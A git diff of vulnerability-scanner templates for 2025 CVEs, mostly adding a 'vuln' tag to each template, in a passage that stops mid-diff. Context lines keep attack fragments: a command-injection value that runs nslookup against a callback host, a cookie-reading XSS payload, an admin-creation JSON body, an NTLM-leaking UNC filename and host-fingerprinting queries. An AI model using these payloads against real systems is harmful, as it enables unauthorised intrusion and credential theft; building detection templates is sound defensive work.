cve,cve2025,ssrf,oast,commvault,kev,vkev,vuln variables: string: "{{to_lower(rand_base(5))}}" diff --git a/http/cves/2025/CVE-2025-34031.yaml b/http/cves/2025/CVE-2025-34031.yaml index db709b7b019..9bae9166183 100644 --- a/http/cves/2025/CVE-2025-34031.yaml +++ b/http/cves/2025/CVE-2025-34031.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-22 metadata: max-request: 1 - tags: cve,cve2025,moodle,lfi,edb,jsmol,vkev + tags: cve,cve2025,moodle,lfi,edb,jsmol,vkev,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-34032.yaml b/http/cves/2025/CVE-2025-34032.yaml index c707c77006a..e35e9323959 100644 --- a/http/cves/2025/CVE-2025-34032.yaml +++ b/http/cves/2025/CVE-2025-34032.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-80 metadata: max-request: 1 - tags: cve,cve2025,moodle,xss,edb,vkev + tags: cve,cve2025,moodle,xss,edb,vkev,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-34035.yaml b/http/cves/2025/CVE-2025-34035.yaml index 186d6ee7132..1d9321a43cc 100644 --- a/http/cves/2025/CVE-2025-34035.yaml +++ b/http/cves/2025/CVE-2025-34035.yaml @@ -23,7 +23,7 @@ info: shodan-query: html:"/web/cgi-bin/usbinfo.cgi" fofa-query: body="/web/cgi-bin/usbinfo.cgi" max-request: 1 - tags: cve,cve2025,engenius,enshare,rce,vkev + tags: cve,cve2025,engenius,enshare,rce,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-34038.yaml b/http/cves/2025/CVE-2025-34038.yaml index 32c7c203e45..8756cf346ff 100644 --- a/http/cves/2025/CVE-2025-34038.yaml +++ b/http/cves/2025/CVE-2025-34038.yaml @@ -19,7 +19,7 @@ info: metadata: max-request: 1 fofa-query: app="泛微-协同办公OA" - tags: cve,cve2025,ecology,sqli,vkev + tags: cve,cve2025,ecology,sqli,vkev,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-34040.yaml b/http/cves/2025/CVE-2025-34040.yaml index 31d442d461c..8d8e92380dd 100644 --- a/http/cves/2025/CVE-2025-34040.yaml +++ b/http/cves/2025/CVE-2025-34040.yaml @@ -16,7 +16,7 @@ info: verified: true max-request: 1 fofa-query: body="seeyon/index.jsp" - tags: cve,cve2025,file-upload,intrusive,zhiyuan,lfi,vkev + tags: cve,cve2025,file-upload,intrusive,zhiyuan,lfi,vkev,vuln variables: marker: "{{randstr}}" diff --git a/http/cves/2025/CVE-2025-34073.yaml b/http/cves/2025/CVE-2025-34073.yaml index 041c86a962c..07d69a487eb 100644 --- a/http/cves/2025/CVE-2025-34073.yaml +++ b/http/cves/2025/CVE-2025-34073.yaml @@ -15,7 +15,7 @@ info: max-request: 1 shodan-query: http.title:"Maltrail" fofa-query: app="Maltrail" - tags: cve,cve2025,maltrail,rce,unauth,oss + tags: cve,cve2025,maltrail,rce,unauth,oss,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-34077.yaml b/http/cves/2025/CVE-2025-34077.yaml index 7a342f01fbd..b8b23556c26 100644 --- a/http/cves/2025/CVE-2025-34077.yaml +++ b/http/cves/2025/CVE-2025-34077.yaml @@ -17,7 +17,7 @@ info: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/pie-register/" - tags: cve,cve2025,wordpress,wp-plugin,pie-register,wp,auth-bypass + tags: cve,cve2025,wordpress,wp-plugin,pie-register,wp,auth-bypass,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-34085.yaml b/http/cves/2025/CVE-2025-34085.yaml index be420c721d5..958fca35fa0 100644 --- a/http/cves/2025/CVE-2025-34085.yaml +++ b/http/cves/2025/CVE-2025-34085.yaml @@ -19,7 +19,7 @@ info: verified: true max-request: 3 fofa-query: body="/wp-content/plugins/simple-file-list/" - tags: cve,cve2025,wordpress,wp-plugin,wp,rce,file-upload,intrusive,simple-file-list + tags: cve,cve2025,wordpress,wp-plugin,wp,rce,file-upload,intrusive,simple-file-list,vuln variables: filepath: '{{rand_base(7, "abcdefghi")}}' diff --git a/http/cves/2025/CVE-2025-34141.yaml b/http/cves/2025/CVE-2025-34141.yaml index 2277af71d1c..d37ccced69d 100644 --- a/http/cves/2025/CVE-2025-34141.yaml +++ b/http/cves/2025/CVE-2025-34141.yaml @@ -28,7 +28,7 @@ info: product: reliance shodan-query: 'html:"ETQ Reliance"' fofa-query: 'body="ETQ Reliance"' - tags: cve,cve2025,etq,reliance,xss,reflected-xss,vkev + tags: cve,cve2025,etq,reliance,xss,reflected-xss,vkev,vuln flow: | http(1) diff --git a/http/cves/2025/CVE-2025-34143.yaml b/http/cves/2025/CVE-2025-34143.yaml index 063ae5b2b1e..0512be7b146 100644 --- a/http/cves/2025/CVE-2025-34143.yaml +++ b/http/cves/2025/CVE-2025-34143.yaml @@ -24,7 +24,7 @@ info: verified: true max-request: 1 shodan-query: html:"ETQ Reliance" - tags: cve,cve2025,etq-reliance,auth-bypass,vkev + tags: cve,cve2025,etq-reliance,auth-bypass,vkev,vuln variables: username: "SYSTEM " diff --git a/http/cves/2025/CVE-2025-3415.yaml b/http/cves/2025/CVE-2025-3415.yaml index c3814d560fc..3558b5e7514 100644 --- a/http/cves/2025/CVE-2025-3415.yaml +++ b/http/cves/2025/CVE-2025-3415.yaml @@ -23,7 +23,7 @@ info: - title="grafana" - app="grafana" google-query: intitle:"grafana" - tags: cve,cve2025,grafana,dingding,dingtalk,apikey,vkev + tags: cve,cve2025,grafana,dingding,dingtalk,apikey,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-34152.yaml b/http/cves/2025/CVE-2025-34152.yaml index 762d9800406..65f3d5ce178 100644 --- a/http/cves/2025/CVE-2025-34152.yaml +++ b/http/cves/2025/CVE-2025-34152.yaml @@ -15,7 +15,7 @@ info: max-request: 1 shodan-query: http.favicon.hash:-741058468 "lighttpd/1.4.32" fofa-query: icon_hash="-741058468" && server=="lighttpd/1.4.32" - tags: cve,cve2025,aitemi,m300,wifi,unauth,rce,vkev + tags: cve,cve2025,aitemi,m300,wifi,unauth,rce,vkev,vuln variables: payload: "`$(nslookup {{interactsh-url}})`" diff --git a/http/cves/2025/CVE-2025-34300.yaml b/http/cves/2025/CVE-2025-34300.yaml index 5203d1ee44c..2ed20d8ea32 100644 --- a/http/cves/2025/CVE-2025-34300.yaml +++ b/http/cves/2025/CVE-2025-34300.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 1 shodan-query: html:"Lighthouse Studio" - tags: cve,cve2025,lighthouse-studio,sawtoothsoftware,rce,ssti,vkev + tags: cve,cve2025,lighthouse-studio,sawtoothsoftware,rce,ssti,vkev,vuln variables: num1: "{{rand_int(40000, 44800)}}" diff --git a/http/cves/2025/CVE-2025-3515.yaml b/http/cves/2025/CVE-2025-3515.yaml index 2a4d2c0a6f5..59463a9fcc2 100644 --- a/http/cves/2025/CVE-2025-3515.yaml +++ b/http/cves/2025/CVE-2025-3515.yaml @@ -24,7 +24,7 @@ info: vendor: codedropz product: drag_and_drop_multiple_file_upload_contact_form_7 publicwww-query: "wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/" - tags: cve,cve2025,wordpress,wp,contact-form-7,file-upload,intrusive,vkev + tags: cve,cve2025,wordpress,wp,contact-form-7,file-upload,intrusive,vkev,vuln variables: phar_marker: "CVE-2025-3515-{{rand_base(8)}}" diff --git a/http/cves/2025/CVE-2025-3605.yaml b/http/cves/2025/CVE-2025-3605.yaml index 0ec47e276e2..6dad56a7258 100644 --- a/http/cves/2025/CVE-2025-3605.yaml +++ b/http/cves/2025/CVE-2025-3605.yaml @@ -25,7 +25,7 @@ info: max-request: 1 fofa-query: body="/wp-content/plugins/frontend-login-and-registration-blocks/" publicwww-query: "/wp-content/plugins/frontend-login-and-registration-blocks/" - tags: cve,cve2025,wp,wp-plugin,wordpress,frontend-login-and-registration-blocks,intrusive,vkev + tags: cve,cve2025,wp,wp-plugin,wordpress,frontend-login-and-registration-blocks,intrusive,vkev,vuln variables: userid: "1" diff --git a/http/cves/2025/CVE-2025-36604.yaml b/http/cves/2025/CVE-2025-36604.yaml index 70b73ed7972..74fa720e1eb 100644 --- a/http/cves/2025/CVE-2025-36604.yaml +++ b/http/cves/2025/CVE-2025-36604.yaml @@ -26,7 +26,7 @@ info: max-request: 1 shodan-query: title:"Unisphere" fofa-query: title="Unisphere" - tags: cve,cve2025,dell,unityvsa,rce,vkev + tags: cve,cve2025,dell,unityvsa,rce,vkev,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-4008.yaml b/http/cves/2025/CVE-2025-4008.yaml index 6675ca60f17..7d73f7f8717 100644 --- a/http/cves/2025/CVE-2025-4008.yaml +++ b/http/cves/2025/CVE-2025-4008.yaml @@ -20,7 +20,7 @@ info: verified: true shodan-query: "meteobridge" fofa-query: "Meteobridge" - tags: cve,cve2025,meteobridge,rce,kev,vkev + tags: cve,cve2025,meteobridge,rce,kev,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-4009.yaml b/http/cves/2025/CVE-2025-4009.yaml index 369f2cf9a85..0c09911c84a 100644 --- a/http/cves/2025/CVE-2025-4009.yaml +++ b/http/cves/2025/CVE-2025-4009.yaml @@ -17,7 +17,7 @@ info: verified: true max-request: 1 shodan-query: html:"evertz.min.css" - tags: cve,cve2025,evertz,rce,unauth,vkev + tags: cve,cve2025,evertz,rce,unauth,vkev,vuln variables: payload: '{"user": {"name": "admin", "login": "admin"},"role":{"name":"administrator", "restrictions": [],"deleteable": false}}' diff --git a/http/cves/2025/CVE-2025-40630.yaml b/http/cves/2025/CVE-2025-40630.yaml index 722300295bb..c88f92e616b 100644 --- a/http/cves/2025/CVE-2025-40630.yaml +++ b/http/cves/2025/CVE-2025-40630.yaml @@ -29,7 +29,7 @@ info: shodan-query: 'http.title:"IceWarp"' fofa-query: 'title="IceWarp"' google-query: intitle:"icewarp" - tags: cve,cve2025,icewarp,redirect,open-redirect + tags: cve,cve2025,icewarp,redirect,open-redirect,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-4123.yaml b/http/cves/2025/CVE-2025-4123.yaml index 3681c105368..83286634c43 100644 --- a/http/cves/2025/CVE-2025-4123.yaml +++ b/http/cves/2025/CVE-2025-4123.yaml @@ -21,7 +21,7 @@ info: max-request: 1 shodan-query: product:"Grafana" fofa-query: app="Grafana" - tags: cve,cve2025,grafana,redirect,unauth,oss,vkev + tags: cve,cve2025,grafana,redirect,unauth,oss,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-41393.yaml b/http/cves/2025/CVE-2025-41393.yaml index 1baf5f5f7fd..b9dc482758c 100644 --- a/http/cves/2025/CVE-2025-41393.yaml +++ b/http/cves/2025/CVE-2025-41393.yaml @@ -20,7 +20,7 @@ info: verified: true max-request: 1 shodan-query: http.html:"Web Image Monitor" - tags: cve,cve2025,ricoh,xss,web + tags: cve,cve2025,ricoh,xss,web,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-41646.yaml b/http/cves/2025/CVE-2025-41646.yaml index af2b553c792..0779b1ffd5e 100644 --- a/http/cves/2025/CVE-2025-41646.yaml +++ b/http/cves/2025/CVE-2025-41646.yaml @@ -24,7 +24,7 @@ info: vendor: kunbus product: revpi_status shodan-query: title:"RevPi" - tags: cve,cve2025,kunbus,revpi-status,auth-bypass,revpi,vkev + tags: cve,cve2025,kunbus,revpi-status,auth-bypass,revpi,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-4322.yaml b/http/cves/2025/CVE-2025-4322.yaml index 60558b03506..217eae8509a 100644 --- a/http/cves/2025/CVE-2025-4322.yaml +++ b/http/cves/2025/CVE-2025-4322.yaml @@ -20,7 +20,7 @@ info: epss-percentile: 0.95057 metadata: fofa-query: body="/wp-content/themes/motors/style.css" - tags: cve,cve2025,motor,intrusive,wordpress,wp-theme,wp,vkev + tags: cve,cve2025,motor,intrusive,wordpress,wp-theme,wp,vkev,vuln variables: password: "{{rand_text_alphanumeric(12)}}" diff --git a/http/cves/2025/CVE-2025-4334.yaml b/http/cves/2025/CVE-2025-4334.yaml index 57a21390781..a565efb8c5d 100644 --- a/http/cves/2025/CVE-2025-4334.yaml +++ b/http/cves/2025/CVE-2025-4334.yaml @@ -25,7 +25,7 @@ info: vendor: lifeisincredible product: simple-user-registration shodan-query: http.component:"wordpress" && http.html:"/wp-content/plugins/simple-user-registration/" - tags: cve,cve2025,wordpress,wp-plugin,wp,intrusive,plugin,simple-user-registration + tags: cve,cve2025,wordpress,wp-plugin,wp,intrusive,plugin,simple-user-registration,vuln variables: diff --git a/http/cves/2025/CVE-2025-4380.yaml b/http/cves/2025/CVE-2025-4380.yaml index 3941a3f3217..55443e720ef 100644 --- a/http/cves/2025/CVE-2025-4380.yaml +++ b/http/cves/2025/CVE-2025-4380.yaml @@ -27,7 +27,7 @@ info: vendor: scripteo product: ads_pro fofa-query: body="/wp-content/plugins/ap-plugin-scripteo" - tags: cve,cve2025,wp,wordpress,wp-plugin,lfi,scripteo,ads-pro + tags: cve,cve2025,wp,wordpress,wp-plugin,lfi,scripteo,ads-pro,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-4388.yaml b/http/cves/2025/CVE-2025-4388.yaml index ae426c6ed8e..d74a9128946 100644 --- a/http/cves/2025/CVE-2025-4388.yaml +++ b/http/cves/2025/CVE-2025-4388.yaml @@ -21,7 +21,7 @@ info: max-request: 1 shodan-query: html:"liferayPortalCSS" fofa-query: body="liferayPortalCSS" - tags: cve,cve2025,liferay,marketplace,xss + tags: cve,cve2025,liferay,marketplace,xss,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-4396.yaml b/http/cves/2025/CVE-2025-4396.yaml index b7aef7d872c..f9675f927b9 100644 --- a/http/cves/2025/CVE-2025-4396.yaml +++ b/http/cves/2025/CVE-2025-4396.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/relevanssi/" - tags: cve,cve2025,wordpress,wp-plugin,wp,relevanssi,time-based-sqli + tags: cve,cve2025,wordpress,wp-plugin,wp,relevanssi,time-based-sqli,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-44148.yaml b/http/cves/2025/CVE-2025-44148.yaml index 0dc69709460..3729e5c1be5 100644 --- a/http/cves/2025/CVE-2025-44148.yaml +++ b/http/cves/2025/CVE-2025-44148.yaml @@ -21,7 +21,7 @@ info: max-request: 1 shodan-query: title:"MailEnable" fofa-query: title="MailEnable" - tags: cve,cve2025,xss,mailenable + tags: cve,cve2025,xss,mailenable,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-44177.yaml b/http/cves/2025/CVE-2025-44177.yaml index aa5dd9172c6..bab8f4a4d5a 100644 --- a/http/cves/2025/CVE-2025-44177.yaml +++ b/http/cves/2025/CVE-2025-44177.yaml @@ -27,7 +27,7 @@ info: vendor: white-star-software product: protop shodan-query: html:"ProTop" - tags: cve,cve2025,lfi,traversal,protop,whitestar,vkev + tags: cve,cve2025,lfi,traversal,protop,whitestar,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-4427.yaml b/http/cves/2025/CVE-2025-4427.yaml index 3e5092c06b0..94e9349449b 100644 --- a/http/cves/2025/CVE-2025-4427.yaml +++ b/http/cves/2025/CVE-2025-4427.yaml @@ -22,7 +22,7 @@ info: fofa-query: icon_hash="362091310" product: endpoint_manager_mobile vendor: ivanti - tags: cve,cve2025,ivanti,epmm,rce,ssti,kev,vkev + tags: cve,cve2025,ivanti,epmm,rce,ssti,kev,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-45854.yaml b/http/cves/2025/CVE-2025-45854.yaml index 7f950a7d720..341ae7653ee 100644 --- a/http/cves/2025/CVE-2025-45854.yaml +++ b/http/cves/2025/CVE-2025-45854.yaml @@ -20,7 +20,7 @@ info: max-request: 1 product: jehc-bpm fofa-query: body="JEHC" - tags: cve,cve2025,jehc-bpm,rce + tags: cve,cve2025,jehc-bpm,rce,vuln flow: http(1) && http(2) diff --git a/http/cves/2025/CVE-2025-45985.yaml b/http/cves/2025/CVE-2025-45985.yaml index d033b727cf7..13b6977a965 100644 --- a/http/cves/2025/CVE-2025-45985.yaml +++ b/http/cves/2025/CVE-2025-45985.yaml @@ -19,7 +19,7 @@ info: verified: true max-request: 1 fofa-query: title="B-LINK" - tags: cve,cve2025,b-link,rce,router,vkev + tags: cve,cve2025,b-link,rce,router,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-4632.yaml b/http/cves/2025/CVE-2025-4632.yaml index 6fb7244882f..d6f9e46764d 100644 --- a/http/cves/2025/CVE-2025-4632.yaml +++ b/http/cves/2025/CVE-2025-4632.yaml @@ -23,7 +23,7 @@ info: vendor: samsung product: magicinfo_9_server shodan-query: "Server: magicinfo premium server" - tags: cve,cve-2025,file-upload,kev,rce,intrusive,vkev + tags: cve,cve-2025,file-upload,kev,rce,intrusive,vkev,vuln variables: filename: "{{rand_text_alpha(6)}}" diff --git a/http/cves/2025/CVE-2025-46554.yaml b/http/cves/2025/CVE-2025-46554.yaml index bd8a01ebc95..a5de95d6895 100644 --- a/http/cves/2025/CVE-2025-46554.yaml +++ b/http/cves/2025/CVE-2025-46554.yaml @@ -21,7 +21,7 @@ info: product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" - tags: cve,cve2025,xwiki,rest-api,exposure,vkev + tags: cve,cve2025,xwiki,rest-api,exposure,vkev,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-46822.yaml b/http/cves/2025/CVE-2025-46822.yaml index 33d5c240216..a5853c90e4f 100644 --- a/http/cves/2025/CVE-2025-46822.yaml +++ b/http/cves/2025/CVE-2025-46822.yaml @@ -18,7 +18,7 @@ info: metadata: verified: true max-request: 1 - tags: cve,cve2025,java,springboot,codebase,lfi + tags: cve,cve2025,java,springboot,codebase,lfi,vuln flow: http(1) && http(2) diff --git a/http/cves/2025/CVE-2025-47204.yaml b/http/cves/2025/CVE-2025-47204.yaml index b8cf7d87af2..dcc88344948 100644 --- a/http/cves/2025/CVE-2025-47204.yaml +++ b/http/cves/2025/CVE-2025-47204.yaml @@ -19,7 +19,7 @@ info: verified: true max-request: 1 shodan-query: html:"bootstrap-multiselect" - tags: cve,cve2025,xss,bootstrap-multiselect,vkev + tags: cve,cve2025,xss,bootstrap-multiselect,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-47423.yaml b/http/cves/2025/CVE-2025-47423.yaml index 7430da57fe1..3d68326ee17 100644 --- a/http/cves/2025/CVE-2025-47423.yaml +++ b/http/cves/2025/CVE-2025-47423.yaml @@ -19,7 +19,7 @@ info: metadata: fofa-query: title="PWS Dashboard" max-request: 2 - tags: cve,cve2025,lfi,pws,traversal + tags: cve,cve2025,lfi,pws,traversal,vuln flow: http(1) && http(2) diff --git a/http/cves/2025/CVE-2025-47539.yaml b/http/cves/2025/CVE-2025-47539.yaml index f84030f9b45..d25bc3b1041 100644 --- a/http/cves/2025/CVE-2025-47539.yaml +++ b/http/cves/2025/CVE-2025-47539.yaml @@ -23,7 +23,7 @@ info: vendor: themewinter product: eventin fofa-query: body="/wp-content/plugins/eventin" - tags: cve,cve2025,wordpress,wp,wp-plugin,eventin,vkev + tags: cve,cve2025,wordpress,wp,wp-plugin,eventin,vkev,vuln variables: name: "{{randbase(5)}}" diff --git a/http/cves/2025/CVE-2025-47646.yaml b/http/cves/2025/CVE-2025-47646.yaml index a113fa3a1a2..cbe9c6f9f17 100644 --- a/http/cves/2025/CVE-2025-47646.yaml +++ b/http/cves/2025/CVE-2025-47646.yaml @@ -18,8 +18,8 @@ info: cve-id: CVE-2025-47646 cwe-id: CWE-640 epss-score: 0.03226 - epss-percentile: 0.86513 - tags: cve,cve2025,wordpress,wp-plugin,psw,intrusive + epss-percentile: 0.86501 + tags: cve,cve2025,wordpress,wp-plugin,psw,intrusive,vuln variables: username: "{{randstr}}" diff --git a/http/cves/2025/CVE-2025-47812.yaml b/http/cves/2025/CVE-2025-47812.yaml index 3a286c852d9..9043daa677e 100644 --- a/http/cves/2025/CVE-2025-47812.yaml +++ b/http/cves/2025/CVE-2025-47812.yaml @@ -33,7 +33,7 @@ info: - "Server: Wing FTP Server" zoomeye-query: - app="Wing FTP Server" - tags: cve,cve2025,rce,wingftp,ftp,unauth,kev,vkev + tags: cve,cve2025,rce,wingftp,ftp,unauth,kev,vkev,vuln variables: cmd: "echo CVE-2025-47812" diff --git a/http/cves/2025/CVE-2025-47813.yaml b/http/cves/2025/CVE-2025-47813.yaml index 35974ec1b7d..6072f671f52 100644 --- a/http/cves/2025/CVE-2025-47813.yaml +++ b/http/cves/2025/CVE-2025-47813.yaml @@ -33,7 +33,7 @@ info: - title="Wing FTP Server" zoomeye-query: - app="Wing FTP Server" - tags: cve,cve2025,wingftp,unauth,exposure + tags: cve,cve2025,wingftp,unauth,exposure,vuln variables: longuid: "{{repeat('A', 2048)}}" diff --git a/http/cves/2025/CVE-2025-47916.yaml b/http/cves/2025/CVE-2025-47916.yaml index 6ad62627bb1..fb2a1fec8a2 100644 --- a/http/cves/2025/CVE-2025-47916.yaml +++ b/http/cves/2025/CVE-2025-47916.yaml @@ -24,7 +24,7 @@ info: max-request: 1 fofa-query: body="Invision" && body="ips4" shodan-query: "Set-Cookie: ips4_" - tags: cve,cve2025,invision,rce,ssti,unauth,seclists,vkev + tags: cve,cve2025,invision,rce,ssti,unauth,seclists,vkev,vuln variables: marker: "{{randstr}}" diff --git a/http/cves/2025/CVE-2025-48827.yaml b/http/cves/2025/CVE-2025-48827.yaml index 6b50b87841a..57e17c4b298 100644 --- a/http/cves/2025/CVE-2025-48827.yaml +++ b/http/cves/2025/CVE-2025-48827.yaml @@ -28,7 +28,7 @@ info: product: vbulletin fofa-query: app="vBulletin" shodan-query: http.component:"vBulletin" - tags: cve,cve2025,rce,vbulletin,intrusive,vkev + tags: cve,cve2025,rce,vbulletin,intrusive,vkev,vuln variables: rand_string: "{{to_lower(rand_base(5))}}" diff --git a/http/cves/2025/CVE-2025-48828.yaml b/http/cves/2025/CVE-2025-48828.yaml index 181fb572bf9..074273a0048 100644 --- a/http/cves/2025/CVE-2025-48828.yaml +++ b/http/cves/2025/CVE-2025-48828.yaml @@ -30,7 +30,7 @@ info: product: vbulletin fofa-query: app="vBulletin" shodan-query: http.component:"vBulletin" - tags: cve,cve2025,rce,vbulletin,intrusive,vkev + tags: cve,cve2025,rce,vbulletin,intrusive,vkev,vuln variables: rand_string: "{{to_lower(rand_base(5))}}" diff --git a/http/cves/2025/CVE-2025-48954.yaml b/http/cves/2025/CVE-2025-48954.yaml index 5c54eb62b77..9618aaccb0e 100644 --- a/http/cves/2025/CVE-2025-48954.yaml +++ b/http/cves/2025/CVE-2025-48954.yaml @@ -25,7 +25,7 @@ info: fofa-query: app="Discourse" zoomeye-query: app:"Discourse" hunter-query: web.title="Discourse" - tags: cve,cve2025,discourse,xss,oauth + tags: cve,cve2025,discourse,xss,oauth,vuln variables: # XSS payloads for different exploitation scenarios diff --git a/http/cves/2025/CVE-2025-49029.yaml b/http/cves/2025/CVE-2025-49029.yaml index 0ab63436aeb..6e2f5716cbe 100644 --- a/http/cves/2025/CVE-2025-49029.yaml +++ b/http/cves/2025/CVE-2025-49029.yaml @@ -17,7 +17,7 @@ info: max-request: 3 publicwww-query: "/wp-content/plugins/custom-login-and-signup-widget/" fofa-query: body="/wp-content/plugins/custom-login-and-signup-widget/" - tags: cve,cve2025,wordpress,intrusive,plugin,wordpress-custom-login,file-upload + tags: cve,cve2025,wordpress,intrusive,plugin,wordpress-custom-login,file-upload,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-49113.yaml b/http/cves/2025/CVE-2025-49113.yaml index 0ff61a96985..045c1a26e69 100644 --- a/http/cves/2025/CVE-2025-49113.yaml +++ b/http/cves/2025/CVE-2025-49113.yaml @@ -27,7 +27,7 @@ info: max-request: 3 shodan-query: http.component:"roundcube" fofa-query: "roundcube_sessid" - tags: cve,cve2025,roundcube,rce,deserialization,intrusive,vkev + tags: cve,cve2025,roundcube,rce,deserialization,intrusive,vkev,vuln flow: | if (http(1)) { diff --git a/http/cves/2025/CVE-2025-49132.yaml b/http/cves/2025/CVE-2025-49132.yaml index 79c52cb57d1..e2a9e8bc145 100644 --- a/http/cves/2025/CVE-2025-49132.yaml +++ b/http/cves/2025/CVE-2025-49132.yaml @@ -35,7 +35,7 @@ info: - icon_hash="-456405319" - icon_hash="846001371" - "Set-Cookie: pterodactyl_session=" - tags: pterodactyl, cve, cve2025, rce, lfi,vkev + tags: pterodactyl, cve, cve2025, rce, lfi,vkev,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-49493.yaml b/http/cves/2025/CVE-2025-49493.yaml index 05cb2648fcf..1d245c264db 100644 --- a/http/cves/2025/CVE-2025-49493.yaml +++ b/http/cves/2025/CVE-2025-49493.yaml @@ -24,7 +24,7 @@ info: shodan-query: html:"Akamai CloudTest" vendor: akamai product: cloudtest - tags: cve,cve2025,akamai,cloudtest,xxe,oast,rce,vkev + tags: cve,cve2025,akamai,cloudtest,xxe,oast,rce,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-49596.yaml b/http/cves/2025/CVE-2025-49596.yaml index 706ceb12834..a4cda5d8921 100644 --- a/http/cves/2025/CVE-2025-49596.yaml +++ b/http/cves/2025/CVE-2025-49596.yaml @@ -19,7 +19,7 @@ info: metadata: verified: true fofa-query: title="MCP Inspector" - tags: cve,cve2025,mcp,anthropic,unauth,passive,vkev + tags: cve,cve2025,mcp,anthropic,unauth,passive,vkev,vuln flow: http(1) && http(2) && http(3) diff --git a/http/cves/2025/CVE-2025-49825.yaml b/http/cves/2025/CVE-2025-49825.yaml index 11fffaaa935..e679b0863d6 100644 --- a/http/cves/2025/CVE-2025-49825.yaml +++ b/http/cves/2025/CVE-2025-49825.yaml @@ -27,7 +27,7 @@ info: - icon_hash="1854879765" - icon_hash="-1275955539" - "Set-Cookie: __Host-grv_csrf" - tags: cve,cve2025,teleport,passive,auth-bypass + tags: cve,cve2025,teleport,passive,auth-bypass,vuln http: - method: GET diff --git a/http/cves/2025/CVE-2025-5086.yaml b/http/cves/2025/CVE-2025-5086.yaml index e79ddbf8851..dae144b377c 100644 --- a/http/cves/2025/CVE-2025-5086.yaml +++ b/http/cves/2025/CVE-2025-5086.yaml @@ -21,7 +21,7 @@ info: max-request: 1 shodan-query: html:"apriso" fofa-query: body="/Apriso/Portal" - tags: cve,cve2024,delmia,apriso,serialization,rce,kev,vkev + tags: cve,cve2024,delmia,apriso,serialization,rce,kev,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-51501.yaml b/http/cves/2025/CVE-2025-51501.yaml index 4ff752fc9dc..4ff2cd8526c 100644 --- a/http/cves/2025/CVE-2025-51501.yaml +++ b/http/cves/2025/CVE-2025-51501.yaml @@ -15,7 +15,7 @@ info: vendor: microweber product: microweber shodan-query: 'http.title:"Microweber"' - tags: cve,cve2025,microweber,xss,authenticated + tags: cve,cve2025,microweber,xss,authenticated,vuln flow: http(1) && http(2) diff --git a/http/cves/2025/CVE-2025-51502.yaml b/http/cves/2025/CVE-2025-51502.yaml index 3ca9b9a6b50..6672a598698 100644 --- a/http/cves/2025/CVE-2025-51502.yaml +++ b/http/cves/2025/CVE-2025-51502.yaml @@ -15,7 +15,7 @@ info: vendor: microweber product: microweber shodan-query: 'http.title:"Microweber"' - tags: cve,cve2025,microweber,xss,authenticated + tags: cve,cve2025,microweber,xss,authenticated,vuln variables: xss_payload: "><script>alert(document.cookie)</script>" diff --git a/http/cves/2025/CVE-2025-52207.yaml b/http/cves/2025/CVE-2025-52207.yaml index 264bced858c..46d931a4fee 100644 --- a/http/cves/2025/CVE-2025-52207.yaml +++ b/http/cves/2025/CVE-2025-52207.yaml @@ -29,7 +29,7 @@ info: fofa-query: - icon_hash="8309143" - title="MikoPBX" - tags: cve,cve2025,miko,mikopbx,intrusive,authenticated,file-upload + tags: cve,cve2025,miko,mikopbx,intrusive,authenticated,file-upload,vuln variables: filename: "{{to_lower(rand_base(8))}}" diff --git a/http/cves/2025/CVE-2025-52488.yaml b/http/cves/2025/CVE-2025-52488.yaml index 9815661a8a9..ed67c72921f 100644 --- a/http/cves/2025/CVE-2025-52488.yaml +++ b/http/cves/2025/CVE-2025-52488.yaml @@ -29,7 +29,7 @@ info: - app="dotnetnuke" - "Set-Cookie: dnn_IsMobile" - icon_hash="-1465479343" - tags: cve,cve2025,file-upload,dotnetnuke,oast,oob,dnnsoftware,oss,ntlm,vkev + tags: cve,cve2025,file-upload,dotnetnuke,oast,oob,dnnsoftware,oss,ntlm,vkev,vuln variables: payload: "%EF%BC%BC%EF%BC%BC{{interactsh-url}}%EF%BC%BC%EF%BC%BCc$%EF%BC%BC%EF%BC%BCan.jpg" diff --git a/http/cves/2025/CVE-2025-5287.yaml b/http/cves/2025/CVE-2025-5287.yaml index e1e6a759046..532c1c6330f 100644 --- a/http/cves/2025/CVE-2025-5287.yaml +++ b/http/cves/2025/CVE-2025-5287.yaml @@ -22,7 +22,7 @@ info: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/posts-like-dislike/" - tags: cve,cve2025,wordpress,wp-plugin,wp,posts-like-dislike,time-based-sqli,sqli,vkev + tags: cve,cve2025,wordpress,wp-plugin,wp,posts-like-dislike,time-based-sqli,sqli,vkev,vuln http: - raw: diff --git a/http/cves/2025/CVE-2025-53118.yaml b/http/cves/2025/CVE-2025-53118.yaml index 34aca76fa63..4e6a60b96b1 100644 --- a/http/cves/2025/CVE-2025-53118.yaml +++ 